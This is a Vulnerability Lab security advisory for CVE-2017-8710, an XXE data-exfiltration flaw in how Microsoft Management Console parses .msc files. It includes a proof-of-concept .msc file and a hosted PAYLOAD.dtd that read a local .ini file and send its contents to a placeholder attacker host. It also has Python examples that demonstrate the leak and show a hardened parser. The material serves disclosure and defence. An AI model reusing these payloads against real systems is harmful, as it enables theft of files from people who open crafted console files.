Microsoft Windows - MSC XXE Data Exfiltrate Vulnerability

Author: S.AbenMassaoud [[email protected]] - @benmassaou - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Source: www.vulnerability-lab.com (VULNERLAB:2094)
Published: Sep 18, 2017
EPSS: 0.005 (Low), percentile 72.7%

Document Title:
===============
Microsoft Windows - MSC XXE Data Exfiltrate Vulnerability 


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2094

MSRC Acknowledgements: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8710

Public References:
https://nvd.nist.gov/vuln/detail/CVE-2017-8710
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8710
https://www.symantec.com/security_response/vulnerability.jsp?bid=100793
https://uk.norton.com/online-threats/microsoftwindowscve-2017-8710informationdisclosurevulne-100793-vulnerability.html

Video: https://www.vulnerability-lab.com/get_content.php?id=2095

CVE-ID:
=======
CVE-2017-8710


Release Date:
=============
2017-09-18


Vulnerability Laboratory ID (VL-ID):
====================================
2094


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Filter or Protection Mechanism Bypass


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
The MSC file extension is a snap-in control file associated with the Microsoft Management Console (MMC),
developed by Microsoft Corporation. Files with this extension are also known as Microsoft Saved Console
files. The Microsoft Management Console allows users to customize the console or its modules to hold
snap-ins, and is used to configure and monitor Windows computer systems. A snap-in contains a program
that provides additional administration functions such as device management, system monitoring and disk
defragmentation; a snap-in can also hold snap-in extensions. Users can create and customize MSC files to
publish a collection of tools or utilities to other users through e-mail, network shares or web posting.
MSC files can also be assigned to other networks, users and groups through policy settings, and system
administrators may impose restrictions through customization. If MMC fails to complete a normal shutdown,
the SMS.msc file may be removed from the system. Files in MSC format are opened by the Microsoft
Management Console on Microsoft Windows platforms.

(Copy of the Homepage:  https://www.reviversoft.com/file-extensions/msc )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered an XML external entity (XXE) data exfiltration vulnerability in the
official Microsoft Management Console (MMC) handling of Microsoft Common Console documents (.msc; Saved Console & System Console
files) on multiple Microsoft Windows operating system products.


Vulnerability Disclosure Timeline:
==================================
2017-05-25: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-06-03: Vendor Notification (Microsoft Security Response Center)
2017-06-05: Vendor Notification / Security Update required (Microsoft Security Response Center)
2017-06-29: Vendor Notification / Plan to release it in September instead of August (Microsoft Security Response Center)
2017-08-11: Vendor Notification / CVE assigned (Microsoft Security Response Center)
2017-09-12: Security Acknowledgements (Microsoft Security Response Center)
2017-09-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corporation
Product: Microsoft Windows - Operating System 7, Server 2008 & Server 2008 R2 - (x32 & x64; see the affected list below)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An XML external entity (XXE) data exfiltration vulnerability has been discovered in the official Microsoft Management
Console (MMC) handling of Microsoft Common Console documents (.msc; Saved Console & System Console files) on multiple
Microsoft Windows operating system products.

An attacker can create a .msc file containing specially crafted XML content that is designed to submit malicious input
to the affected software.

The vulnerability is due to improper parsing of XML content that contains a reference to an external entity. An attacker
could exploit this vulnerability by persuading an authenticated user to open a maliciously crafted .msc file. A successful
exploit allows the attacker to conduct an XML external entity (XXE) attack: the parser resolves the external entity, reads
the referenced local file and, through a second entity declared in an attacker-hosted DTD, sends its contents to an
attacker-controlled server, disclosing sensitive information on the targeted system that may aid in further attacks.

In all cases the vulnerability can be used for data exfiltration and, as a stepping stone, for compromise of the victim's
machine; exploitation relies on social engineering to get the file opened (phishing, a remote share, a USB drive, an HID
attack, etc.).

The security risk of the XML external entity (XXE) data exfiltration vulnerability is estimated as medium.
Exploitation of the vulnerability does not require the target user to have any special permissions.
Successful exploitation of the vulnerability results in data exfiltration and can contribute to a computer system compromise.
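The mechanism described above, as an added example that is not part of the advisory or the author's PoC: Python's
stdlib SAX parser (expat) is first configured to resolve external general entities, so a DOCTYPE with a SYSTEM entity
pointing at a local file leaks that file's contents into the parsed document, and is then hardened by refusing any DOCTYPE.
It uses an in-band variant (the contents land in the parsed text) rather than the PoC's out-of-band HTTP chain, so it
runs offline; the DOCTYPE shape (`r`, `<pwn>&send;</pwn>`) mirrors the PoC, but the document is not a real MMC console
file and the secret .ini file, its contents and the temporary path are constructed here.

```python
"""XXE mechanism behind an external-entity file read, shown with Python's
stdlib SAX parser (expat) and then blocked by a hardened parser.

Added example for this advisory, not the author's PoC. It uses an in-band
variant (the file contents land in the parsed document) instead of the
out-of-band HTTP exfiltration so it runs offline. The DOCTYPE shape mirrors
the PoC, but this is not a real MMC console file; the secret file and its
contents are constructed here."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler


class TextCollector(ContentHandler):
    """Collects character data: whatever the entity reference expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


class RefuseDTD:
    """Lexical handler that aborts on any DOCTYPE. A console file never needs
    a DTD, so its presence is itself the indicator of a crafted document."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE refused: entity declarations not allowed")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def crafted_document(target_path):
    """Same DOCTYPE shape as the advisory's PoC, but the external entity
    points straight at a local file (constructed sample, not a real .msc)."""
    return (
        '<?xml version="1.0" ?>\n'
        '<!DOCTYPE r [\n'
        f'<!ENTITY send SYSTEM "{target_path}">\n'
        ']>\n'
        '<pwn>&send;</pwn>\n'
    )


def parse_console(doc, resolve_external, refuse_dtd=False):
    """Parse `doc` and return its character data.

    resolve_external=True makes expat fetch SYSTEM entities (the vulnerable
    behaviour); refuse_dtd=True installs RefuseDTD (the hardened parser)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    if refuse_dtd:
        parser.setProperty(property_lexical_handler, RefuseDTD())
    parser.parse(io.BytesIO(doc.encode("utf-8")))
    return collector.text()


def demo():
    """Returns (leaked_text, text_with_externals_off, hardened_refused)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.ini")  # stands in for C:\Windows\<name>.ini
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("[Credentials]\npassword=hunter2\n")  # constructed content
        doc = crafted_document(secret)
        leaked = parse_console(doc, resolve_external=True)
        skipped = parse_console(doc, resolve_external=False)
        try:
            parse_console(doc, resolve_external=True, refuse_dtd=True)
            refused = False
        except ValueError:
            refused = True
    return leaked, skipped, refused


if __name__ == "__main__":
    leaked, skipped, refused = demo()
    print("vulnerable parser saw:", repr(leaked))
    print("externals disabled saw:", repr(skipped))
    print("hardened parser refused DOCTYPE:", refused)
```

Disabling external general entities is enough to stop this particular read, but refusing the DOCTYPE outright is the safer
rule for a format that never legitimately carries one: it also closes parameter-entity tricks, entity-expansion denial of
service and any future resolver feature you forgot to turn off.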

Affected Software - File Type(s):
[+] Microsoft Common Console Document (.msc)

Affected:
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Tested on:
[+] Windows XP Service Pack 3
[+] Windows 7 Ultimate
[+] Windows 10 Pro


Proof of Concept (PoC):
=======================
The XML external entity (XXE) data exfiltration vulnerability can be exploited by remote attackers without special user permissions,
provided a local user can be persuaded to open the crafted .msc file.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1. The video above:
[+] Tested on Windows XP SP3

2. Local system group/user permission required:
[+] Authenticated Users

PoC: Exploitation
## Malicious MSC file ##

<?xml version="1.0" ?>
<!DOCTYPE r [
<!-- external parameter entity: the local file to read ([File-Name] is a placeholder for the target) -->
<!ENTITY % file SYSTEM "C:\Windows\[File-Name].ini">
<!-- external parameter entity: the attacker-hosted DTD that declares the exfiltration entity -->
<!ENTITY % dtd SYSTEM "http://x.x.x.x:443/PAYLOAD.dtd">
%dtd;]>
<!-- &send; is declared by PAYLOAD.dtd; resolving it requests a URL that carries the file contents -->
<pwn>&send;</pwn>

## PAYLOAD.DTD ##

<?xml version="1.0" encoding="UTF-8"?>
<!-- %file; is expanded inside the entity value, so the declared SYSTEM URL embeds the file contents -->
<!ENTITY % all "<!ENTITY send SYSTEM 'http://x.x.x.x:443/?%file;'>">
%all;
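The two-stage chain in the PoC above, traced as an added example that is not part of the advisory: a deliberately small
DTD entity expander, written for this trace and not a real XML parser, walks the declarations in the order a resolving
parser would, so you can see `%dtd;` pull in PAYLOAD.dtd, `%file;` get replaced by the target file inside the entity
value, `%all;` declare `&send;`, and the final resolution of `&send;` become the request that leaks the data. The listener
`http://x.x.x.x:443`, the hosted PAYLOAD.dtd text, the target file and its single-line contents are all constructed
stand-ins.

```python
"""Traces the two-stage parameter-entity chain of the advisory's PoC without
a network listener, to show how the file contents end up in a URL.

Added example, not part of the advisory. This is a deliberately small DTD
entity expander constructed for the trace, not a real XML parser. The
listener http://x.x.x.x:443, the hosted PAYLOAD.dtd and the target file
are constructed stand-ins."""
import os
import re
import tempfile

LISTENER = "http://x.x.x.x:443"  # hypothetical attacker host, as in the PoC

# One DTD declaration or one parameter-entity reference. Quoted literals are
# matched as a unit so a '>' inside an entity value does not end the declaration.
DTD_TOKEN = re.compile(
    r'<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[\w.-]+)\s+'
    r'(?P<sys>SYSTEM\s+)?(?P<val>"[^"]*"|\'[^\']*\')\s*>'
    r'|%(?P<ref>[\w.-]+);')
PE_REF = re.compile(r'%([\w.-]+);')
GE_REF = re.compile(r'&([\w.-]+);')
DOCTYPE = re.compile(r'<!DOCTYPE\s+[\w.-]+\s*\[(.*?)\]\s*>', re.S)


def trace_entity_chain(doc, hosted):
    """Return, in order, every SYSTEM id a resolving parser would fetch while
    processing `doc`. `hosted` maps attacker URLs to the content they serve;
    any other SYSTEM id is read from the local filesystem if it exists."""
    pes, ges, requests = {}, {}, []

    def fetch(sysid):
        requests.append(sysid)
        if sysid in hosted:
            return hosted[sysid]
        if os.path.isfile(sysid):
            with open(sysid, encoding="utf-8") as fh:
                return fh.read()
        return ""  # nothing served: the request itself already carried the data

    def replacement(name):
        kind, value = pes[name]
        return value if kind == "literal" else fetch(value)

    def expand_pe_refs(text):
        # %name; inside an entity value (external subset): substitute the
        # entity's replacement text; for an external PE that is the file read.
        return PE_REF.sub(lambda m: replacement(m.group(1)), text)

    def process_subset(markup):
        for tok in DTD_TOKEN.finditer(markup):
            if tok.group("ref"):
                # %name; between declarations: its replacement text is parsed
                # as more DTD markup. This is how PAYLOAD.dtd, and then the
                # nested <!ENTITY send ...> declaration, get in.
                process_subset(replacement(tok.group("ref")))
                continue
            value = tok.group("val")[1:-1]
            entry = ("system", value) if tok.group("sys") else ("literal", expand_pe_refs(value))
            (pes if tok.group("pe") else ges)[tok.group("name")] = entry

    m = DOCTYPE.search(doc)
    if m:
        process_subset(m.group(1))
    for ref in GE_REF.findall(doc[m.end():] if m else doc):
        kind, value = ges.get(ref, ("literal", ""))
        if kind == "system":
            fetch(value)  # &send; -> GET http://x.x.x.x:443/?<file contents>
    return requests


def demo():
    """Builds the PoC documents against a constructed target and returns the fetch trace."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "target.ini")  # stands in for C:\Windows\[File-Name].ini
        with open(target, "w", encoding="utf-8") as fh:
            fh.write("password=hunter2")  # constructed single-line secret
        msc = (
            '<?xml version="1.0" ?>\n'
            '<!DOCTYPE r [\n'
            f'<!ENTITY % file SYSTEM "{target}">\n'
            f'<!ENTITY % dtd SYSTEM "{LISTENER}/PAYLOAD.dtd">\n'
            '%dtd;]>\n'
            '<pwn>&send;</pwn>\n'
        )
        hosted = {
            f"{LISTENER}/PAYLOAD.dtd": (
                '<?xml version="1.0" encoding="UTF-8"?>\n'
                f"<!ENTITY % all \"<!ENTITY send SYSTEM '{LISTENER}/?%file;'>\">\n"
                "%all;\n"
            )
        }
        return trace_entity_chain(msc, hosted)


if __name__ == "__main__":
    for sysid in demo():
        print("parser fetches:", sysid)
```

The trace is three requests: PAYLOAD.dtd from the listener, the local target file, and finally the listener again with the
file contents in the query string, which is the only request the attacker's web server needs to log. The expander skips
what a real parser would also enforce on that last step: the assembled string must still be an acceptable URL, so
newlines and other characters that are not URL-legal in a multi-line target (an .ini file usually has several lines)
often make the request fail, which is why single-line files are the usual targets when exfiltrating over HTTP.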


Solution - Fix & Patch:
=======================
Microsoft has addressed the vulnerability in its September 2017 security update by changing how the affected software parses the delivered XML content (see the MSRC advisory for CVE-2017-8710 referenced above).


Security Risk:
==============
The security risk of the XXE data exfiltration vulnerability is estimated as medium. (CVSS 4.3)


Credits & Authors:
==================
S.AbenMassaoud [[email protected]] - @benmassaou - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud 


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™